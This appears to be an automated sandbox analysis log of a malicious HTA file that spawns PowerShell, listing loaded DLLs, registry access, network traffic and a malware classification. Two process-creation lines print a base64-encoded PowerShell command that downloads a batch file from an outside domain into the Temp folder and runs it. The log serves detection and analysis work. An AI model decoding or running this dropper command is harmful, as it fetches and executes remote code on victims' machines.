Source: powershell.exe, 00000002.00000002.1695910492.0000000005B48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: mshta.exe, 00000000.00000003.1700820649.0000000002B4F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1700851809.0000000002B56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1708862080.0000000002B59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wdcp.microsoft.w
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownHTTPS traffic detected: 193.26.115.39:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_02CFA3F42_2_02CFA3F4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_02CFAF302_2_02CFAF30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_02CFB9FE2_2_02CFB9FE
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: classification engineClassification label: mal64.evad.winHTA@4/3@1/1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3668:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lnl1fx4e.b2x.ps1Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\c1.hta"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -EncodedCommand WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgA7AA0ACgBoAHQAdABwAHMAOgAvAC8AYwBhAG4AZAB3AGYAYQByAG0AcwBsAGwAYwAuAGMAbwBtAC8AYwAyAC4AYgBhAHQAPQAnAGgAdAB0AHAAcwA6AC8ALwBjAGEAbgBkAHcAZgBhAHIAbQBzAGwAbABjAC4AYwBvAG0ALwBjADIALgBiAGEAdAAnADsADQAKAEMAOgBcAFUAcwBlAHIAcwBcAGEAcwBhAG8AbABcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAYwAyAC4AYgBhAHQAPQBDADoAXABVAHMAZQByAHMAXABhAHMAYQBvAGwAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcAAgACsAIAAnAFwAYwAyAC4AYgBhAHQAJwA7AA0ACgBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAaAB0AHQAcABzADoALwAvAGMAYQBuAGQAdwBmAGEAcgBtAHMAbABsAGMALgBjAG8AbQAvAGMAMgAuAGIAYQB0ACAALQBPAHUAdABGAGkAbABlACAAQwA6AFwAVQBzAGUAcgBzAFwAYQBzAGEAbwBsAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABjADIALgBiAGEAdAA7AA0ACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABhAHMAYQBvAGwAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAGMAMgAuAGIAYQB0ACAALQBOAG8ATgBlAHcAVwBpAG4AZABvAHcA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -EncodedCommand WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgA7AA0ACgBoAHQAdABwAHMAOgAvAC8AYwBhAG4AZAB3AGYAYQByAG0AcwBsAGwAYwAuAGMAbwBtAC8AYwAyAC4AYgBhAHQAPQAnAGgAdAB0AHAAcwA6AC8ALwBjAGEAbgBkAHcAZgBhAHIAbQBzAGwAbABjAC4AYwBvAG0ALwBjADIALgBiAGEAdAAnADsADQAKAEMAOgBcAFUAcwBlAHIAcwBcAGEAcwBhAG8AbABcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAYwAyAC4AYgBhAHQAPQBDADoAXABVAHMAZQByAHMAXABhAHMAYQBvAGwAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcAAgACsAIAAnAFwAYwAyAC4AYgBhAHQAJwA7AA0ACgBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAaAB0AHQAcABzADoALwAvAGMAYQBuAGQAdwBmAGEAcgBtAHMAbABsAGMALgBjAG8AbQAvAGMAMgAuAGIAYQB0ACAALQBPAHUAdABGAGkAbABlACAAQwA6AFwAVQBzAGUAcgBzAFwAYQBzAGEAbwBsAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABjADIALgBiAGEAdAA7AA0ACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABhAHMAYQBvAGwAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAGMAMgAuAGIAYQB0ACAALQBOAG8ATgBlAHcAVwBpAG4AZABvAHcAJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000002.00000002.1697987815.0000000007330000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb35 source: powershell.exe, 00000002.00000002.1692460434.0000000002DF1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dows\dll\mscorlib.pdb source: powershell.exe, 00000002.00000002.1697987815.0000000007330000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
